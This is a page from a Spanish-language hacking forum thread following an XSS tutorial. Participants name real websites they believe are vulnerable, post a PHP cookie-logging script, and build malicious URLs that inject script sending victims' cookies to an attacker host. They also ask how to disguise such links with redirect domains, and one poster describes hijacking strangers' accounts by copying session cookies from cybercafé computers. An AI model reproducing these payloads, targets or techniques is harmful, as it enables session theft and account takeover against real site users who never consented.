Páginas: 1 [2] 3 
|
 |
|
 Autor
|
Tema: [::Tutorial::] - Ataques XSS (Leído 30663 veces)
|
-hkj-
 Desconectado
Mensajes: 883
"Yo,HkJ"
|
Una cosa, todavia no e encontrado una web vulnerable, e buscado en todos mis favoritos y todos los buscadores no me dan la alerta, alguien sabe algun site que tenga el fallo ??? ??? ???
|
|
|
|
|
En línea
|
"Sin metodo, sin orden, sin voluntad, no es posible el triunfo"
|
|
|
|
9reynas
|
debido a lo antiguo de este no se si daran respuesta bueno encontre una direccion que es vulnerable http://campusvirtual.uma.es/ihj/_contenidos/buscador.phpbueno le das a <script>alert()</script> y te salta la alerta ,, asiq uebueno umm cheque las fuentes y .... <form action="" method="post"> <input type="text" name="search_term" size="40" maxlength="40" value=""> <input type="submit" value="Buscar"> </form> como se daran cuenta este form no tiene ni nombre y el boton de envio tampoco tiene nombre mi pregunta es como quedaria la web a la que le tendrian que linkear los demas que hago remmplazo los espacios de los nombres con espacios vacios osea nada ??????????.............. asi ademas esta web no tiene sistema de usuarios pero me queda la duda de como seria la direccionm aligna como dice neo hex thank por las respuestas 9reynas |
|
|
|
|
En línea
|
|
|
|
|
9reynas
|
respondiendole al tioq ue posteoun poco mas arriba basta con poner buscador.php en google  bueno checando mejor esto se me ocurre algoo mas el script de cokies.phpcomo se ve en su variable $cokie hace la peticion de la cokie cookies.php Código: <? $cookie = $_GET['cookie']; $fff = fopen("archivo.txt","a"); fwrite($fff, "$cookie \n"); fclose($fff); ?> ahora viene so esta claro lo del archivo.txt que se deposita la cokie alli tambiene sta caro pero en esta url Código: http://www.vulnerable.com/buscador.php?palabra=<script>window.location=' http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=; hasta donde me dan mis pobrees conocimientos de cgi cuando se pasa una consulata a un formulario los datos introducidos se pasan como despues del scrip cgi en este formato lawe.com/script.cgi?nombre=valor&nombre1=valor1 etc etc dependiendo d elos campos del form aqui mi duda entonces l primer cgi seria buscador.php ahora la primera pareja seria palabra=<script>window.location=' http://www.atacante.com/cookies.php?cookie='+document.cookie;</script> y la segunda pareja seria buscar=; ahora analizando la primera pareja checamos esta parte ' http://www.atacante.com/cookies.php?cookie='+document.cookieahora en esto el cgi seria cookies.php y su pareja seria cookie='+document.cookie ahora sia lguien postea las fuentes de buscador.php seria buenisimo igual la voya buscar supongo que eso nos aclararia bastante loq ue hace esa url buenoo voya buscar ciao 9reynas de ante mano si me equivoco en algo corriganme y nada salu2 |
|
|
|
|
En línea
|
|
|
|
Adept
Desconectado
Mensajes: 25
|
Si la página esn vez de estar hecha en php está hecha en cfml, ¿cómo quedaría el código del archivo?
|
|
|
|
|
En línea
|
Those were the words of Adept...
|
|
|
|
G4rBaG3
|
Aca el nombre del formulario seria 'formul' Pero el nombre del boton????? cual es??? <tr> <form name="formul" method="get" action="../home/search.php"> <td><img src="images/spacer.gif" width="5"></td> <td><input type="text" id="palabras" name="palabras" class="campo" size="31" value=""></td> <td><img src="images/spacer.gif" width="3"></td> <td width="65" align="center"><a href="javascript:document.formul.submit();" onClick="document.formul.submit();"><img src="../home/X2x.gif" vspace="2" width="60" height="18" border="0"></a></td> </form> Salu2. |
|
|
|
|
En línea
|
Don't worry, be hacked....
|
|
|
joanikus
Desconectado
Mensajes: 4
|
okey gracias por el tuto pero yo lo poongo en un buscadoir e nuke et y me da error eso se considera aletra¿
|
|
|
|
|
En línea
|
|
|
|
Rentero
Colaborador
Desconectado
Mensajes: 1.155
La paciencia es la madre de la ciencia.
|
Ni me acordaba de este tutorial xD Aca el nombre del formulario seria 'formul' Pero el nombre del boton????? cual es??? <tr> <form name="formul" method="get" action="../home/search.php"> <td><img src="images/spacer.gif" width="5"></td> <td><input type="text" id="palabras" name="palabras" class="campo" size="31" value=""></td> <td><img src="images/spacer.gif" width="3"></td> <td width="65" align="center"><a href="javascript:document.formul.submit();" onClick="document.formul.submit();"><img src="../home/X2x.gif" vspace="2" width="60" height="18" border="0"></a></td> </form> Salu2. En este caso no hay ningún botón. Hay un enlace que llama a una función de javascript llamada submit(). Mira el código fuente de esa función a ver si puedes sacar algo  P.D: Recuerdo que esto es solo un pequeño texto de introducción Y que ya cada vez hay menos webs con este error. Parece que estamos aprendiendo a programar xDD |
|
|
|
|
En línea
|
Firmado.
|
|
|
joanikus
Desconectado
Mensajes: 4
|
eyy muxas gracias por el tuto pero una cosilla esa url maligna se puede camuflar con un .tk o .cjb.net??? gracias
|
|
|
|
|
En línea
|
|
|
|
Rentero
Colaborador
Desconectado
Mensajes: 1.155
La paciencia es la madre de la ciencia.
|
Pues upongo que si. Pero si no recuerdo mal ahora en TK te teine 15 segundo(o hasta que pulses un enlace) en una pagina promocinal. No creo que eso sea uy creible...bueno, es cuestión de probar.
|
|
|
|
|
En línea
|
Firmado.
|
|
|
741852
Desconectado
Mensajes: 1.595
Central, Pont Aeri, Kontrol, Mansion, Masia...(L)
|
una web vulnerable a este tipo de atake es: www.programas-gratis.netsi no m ekivoco, pero yo como soy una buena niña, m comporto y no ataco lo primero q es vulnerable... |
|
|
|
|
En línea
|
since 1992 there's a club wich is making history, seven years later in 1999 it's still kicking!, PONT AERI!
..... and in 2008 IT'S STILL KICKING !!!
pont aeri siempre
hardcore for life [H4L]
|
|
|
|
sirdarckcat
|
@Torocatala:
prohibido dar informacion de terceros.
|
|
|
|
|
En línea
|
|
|
|
|
|
Crack_X
Anti-War
Colaborador
Desconectado
Mensajes: 2.324
Peace & Love
|
|
|
|
|
|
En línea
|
|
|
|
satan69
Desconectado
Mensajes: 308
|
gracias..  ademas de eso quiero que me ayuden hacer un link maligno.. <td align="center"><p>Buscar Blogs</p></td>
</tr>
<tr>
<td align="center"><input id="keyword" name="keyword" size="10" type="text" /></td>
</tr>
<tr>
<td align="center"><input name="submit" type="submit" value="Buscar" /><
http://www.victima.com/?Keyword=<script>window.location=' http://server/cookies.php?cookie='+document.cookie;</script>&buscar=; la victima no tiene buscador.php sino que en la pagina principal esta el buscador... si es ese el enlace digame sino pues me puede corregir |
|
|
|
« Última modificación: 07 Agosto 2006, 07:58 por satan69 »
|
En línea
|
|
|
|
frankener1986
Desconectado
Mensajes: 83
Si hoy fuera perfecto, no necesitaríamos un mañana
|
Otra manera es irse a un ciber, y mirar a alguno que este en una pagina la cual te gustaria tener su cuenta... con un poco de suerte, si cierra la ventana del explorador sin hacer logout, vas al explorador en el que estaba, le das a ver las cookies, buscas el nombre de la pagina, y te las apuntas las dos (o puede que alguna mas, suelen ser user y password), y luego, en tu casa, creas las cookies que copiaste en aquel papel... y listo.. y si la pagina no pide confirmacion de contraseña actual para cambiarle el password, hasta podras hacerlo xD
|
|
|
|
|
En línea
|
La diversión que tienes ahora es directamente proporcional a los problemas que luego tendrás   |
|
|
|
Páginas: 1 [2] 3 
|
|
|
 |
